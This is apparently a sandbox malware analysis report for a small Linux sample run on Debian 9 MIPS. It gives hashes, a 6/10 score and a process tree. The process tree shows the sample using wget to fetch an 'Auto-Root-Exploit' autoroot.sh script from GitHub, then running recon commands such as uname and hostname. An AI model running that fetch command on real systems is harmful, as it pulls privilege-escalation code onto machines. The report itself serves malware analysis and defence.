Overview

overview

6

Static

static

1

e8609b5fe3...kes118

ubuntu-18.04-amd64

6

e8609b5fe3...kes118

debian-9-armhf

6

e8609b5fe3...kes118

debian-9-mips

6

e8609b5fe3...kes118

debian-9-mipsel

6

Analysis

  • max time kernel
    2s
  • max time network
    3s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    18-09-2024 04:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e8609b5fe37bbc37ac72c127ab2a94e9_JaffaCakes118

  • Size

    12KB

  • MD5

    e8609b5fe37bbc37ac72c127ab2a94e9

  • SHA1

    5cdbb385ff43a45b8da48208592031b0d211f17f

  • SHA256

    873fe8f1464c6e7a7f74ab8c1ea3c356a029d43a7a6a9de8eb5c887937234d11

  • SHA512

    0467c2fbaf0bee085fab4a12bd95d42db0fc9d0e88b79e5616799451fd4822d7bc878a4d319b64fcefe6cecac7b3507e5db3955d182a03368712f5e14742850c

  • SSDEEP

    384:9MjVCXEXuK/WZDgD8AapX8XCkLWkWKzPKplKsNemW84mkXm+roosjh5oBq:xXEXeZDgD8AapX8XdLWk1zoIweb84mkU

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Processes

  • /tmp/e8609b5fe37bbc37ac72c127ab2a94e9_JaffaCakes118
    /tmp/e8609b5fe37bbc37ac72c127ab2a94e9_JaffaCakes118
    1⤵
      PID:709
      • /usr/bin/clear
        clear
        2⤵
          PID:712
        • /bin/ping
          ping -c 1 raw.githubusercontent.com -i 1000
          2⤵
            PID:715
          • /usr/bin/wget
            wget https://raw.githubusercontent.com/nilotpalbiswas/Auto-Root-Exploit/master/autoroot.sh "--timeout=5" -q -O -
            2⤵
              PID:724
            • /bin/grep
              grep "ver="
              2⤵
                PID:725
              • /usr/bin/cut
                cut "-d=" -f2
                2⤵
                  PID:726
                • /usr/bin/cut
                  cut "-d " -f1
                  2⤵
                    PID:741
                  • /bin/hostname
                    hostname
                    2⤵
                      PID:743
                    • /bin/uname
                      uname -r
                      2⤵
                        PID:745

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • /root/.wget-hsts
                      Filesize

                      180B

                      MD5

                      ceb7eddc1edcc8ab43e023863cc74567

                      SHA1

                      d1b57ebace5bbd41b9b751010d56723552505ab6

                      SHA256

                      3967eaab271a9bb1b0237ee5dbd6d412cc1b7a3d97dcc1a58258df26d963d104

                      SHA512

                      a9d78bf6cf64055b9e3b05514733d07e0b678564ac54ac1b7dd1bcd9661799e64b7c2f6fd646fa395aed65a22a9d811600b796d2bfbe2c1b7624524cf94bad48

                      Download Submit